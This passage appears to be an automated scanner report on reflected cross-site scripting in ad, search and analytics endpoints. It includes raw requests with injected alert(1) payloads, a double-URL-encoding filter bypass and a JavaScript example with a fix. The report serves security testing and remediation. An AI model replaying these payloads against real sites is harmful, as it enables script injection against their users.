GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&9476a"-alert(1)-"985f8e3db43=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
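The findings above all share one sink: the query string is rebuilt inside a double-quoted JavaScript string, and even the name of an arbitrary parameter (finding 5.89) reaches it. The `"-alert(1)-"` payload is chosen because it closes the string and reopens it with subtraction operators, so the statement stays syntactically valid and no `;`, `<` or `//` is needed. The following added example (not the ad server's code) reproduces that behaviour against a constructed query string and shows a sink-side fix; `vulnerableScript()`, `hardenedScript()`, `executes()` and the `clickUrl` template are assumptions.

```javascript
// Added example, not code from the scanned ad server. Demonstrates why a
// "-alert(1)-" payload executes when a query string is rebuilt inside a
// double-quoted JavaScript string, and how to encode for that context.
// vulnerableScript(), hardenedScript(), executes() and the clickUrl template
// are assumptions; the query string is constructed from finding 5.89.

const QUERY =
  'click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&9476a"-alert(1)-"985f8e3db43=1';

// Vulnerable: every name=value pair, names included, is copied verbatim
// into the JavaScript source that is returned to the browser.
function vulnerableScript(query) {
  const pairs = query.split('&').filter(Boolean).map((p) => {
    const i = p.indexOf('=');
    return i === -1 ? [p, ''] : [p.slice(0, i), p.slice(i + 1)];
  });
  const rebuilt = pairs.map(([k, v]) => `${k}=${v}`).join('&');
  return `var clickUrl = "${rebuilt}";`;
}

// Encoder for a JavaScript string sink. JSON.stringify handles " and \ ;
// the extra replacements keep </script> and <!-- out of an inline script
// block and neutralise the JS line terminators U+2028/U+2029.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened: re-serialise the parameters (URLSearchParams percent-encodes
// names and values) and emit the result through the context encoder.
function hardenedScript(query) {
  const rebuilt = new URLSearchParams(query).toString();
  return `var clickUrl = ${jsStringLiteral(rebuilt)};`;
}

// Runs a generated script with a stubbed alert() so execution can be
// checked offline. Returns true only if alert() was actually called.
function executes(script) {
  let fired = false;
  const fakeAlert = () => { fired = true; return 0; };
  try {
    new Function('alert', script)(fakeAlert);
  } catch (e) {
    return false; // a syntax or runtime error means the payload did not run
  }
  return fired;
}
```

`executes(vulnerableScript(QUERY))` returns true because the emitted source is `var clickUrl = "...&9476a"-alert(1)-"985f8e3db43=1";`, which the engine evaluates as `"..." - alert(1) - "..."`. `executes(hardenedScript(QUERY))` returns false: the quote survives only as `%22` inside a properly delimited literal. Note that the encoder must match the sink; HTML entity encoding would leave a literal `&quot;` inside the script and is the wrong tool here.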
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ad74"-alert(1)-"523f8ff21d1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=84798989ad74"-alert(1)-"523f8ff21d1&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77be7"-alert(1)-"86a6913ea5d was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015277be7"-alert(1)-"86a6913ea5d&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79400"-alert(1)-"898301abb9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad79400"-alert(1)-"898301abb9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a932"-alert(1)-"098c112b24 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ9a932"-alert(1)-"098c112b24&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5 was submitted in the REST URL parameter 2. This input was echoed as bdbb2";alert(1)//d3a2d6e4cb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c9b%2522%253balert%25281%2529%252f%252fe620cc65532 was submitted in the REST URL parameter 3. This input was echoed as 36c9b";alert(1)//e620cc65532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3036c9b%2522%253balert%25281%2529%252f%252fe620cc65532/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:42:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be94"-alert(1)-"68a9d8cb374 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534883be94"-alert(1)-"68a9d8cb374&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734d6"-alert(1)-"39b801b9989 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G734d6"-alert(1)-"39b801b9989&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f21b"-alert(1)-"3bd3b22176f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5f21b"-alert(1)-"3bd3b22176f&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2bd"-alert(1)-"c32921f3ace was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&8d2bd"-alert(1)-"c32921f3ace=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 was submitted in the q parameter. This input was echoed as 412b0<img src=a onerror=alert(1)>167ebef1169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that this response is served with Content-Type: application/json, so the injected markup executes only if a browser renders the response as an HTML document (for example by content-sniffing on direct navigation, in the absence of an X-Content-Type-Options: nosniff header); confirm the rendering context in a browser before rating this finding.
Request
GET /qsonhs.aspx?form=MSN005&q=412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 HTTP/1.1 Host: api.bing.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF
Response
HTTP/1.1 200 OK Content-Length: 79 Content-Type: application/json; charset=utf-8 X-Akamai-TestID: dc4cad0d277c4e69b70a6ff416da300c Date: Tue, 26 Apr 2011 18:36:47 GMT Connection: close
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7a00<script>alert(1)</script>2b050c4882a was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 18:36:29 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 595c5<script>alert(1)</script>e3e814fd6cc was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The beacon.js response (here and for the c2 to c6 findings that follow) is served as application/x-javascript and is normally loaded through a script element, where a literal <script> tag is JavaScript syntax rather than HTML; the payload therefore runs only when a browser treats the response as an HTML document. Verify that rendering path in a browser before rating these findings.
Request
GET /beacon.js?c1=3595c5<script>alert(1)</script>e3e814fd6cc&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:44 GMT Date: Tue, 26 Apr 2011 18:39:44 GMT Connection: close Content-Length: 1250
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66376<script>alert(1)</script>fbc5d350fe7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=603533866376<script>alert(1)</script>fbc5d350fe7&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:45 GMT Date: Tue, 26 Apr 2011 18:39:45 GMT Connection: close Content-Length: 1250
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a0acc<script>alert(1)</script>2c22c5ef1fd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!a0acc<script>alert(1)</script>2c22c5ef1fd&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:46 GMT Date: Tue, 26 Apr 2011 18:39:46 GMT Connection: close Content-Length: 1250
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... ar c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 2724d<script>alert(1)</script>ef3e74934bc was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!2724d<script>alert(1)</script>ef3e74934bc&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:46 GMT Date: Tue, 26 Apr 2011 18:39:46 GMT Connection: close Content-Length: 1250
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 41c00<script>alert(1)</script>f9b5dad6c03 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=6243129141c00<script>alert(1)</script>f9b5dad6c03&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:47 GMT Date: Tue, 26 Apr 2011 18:39:47 GMT Connection: close Content-Length: 1250
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 98717<script>alert(1)</script>403ae54048e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
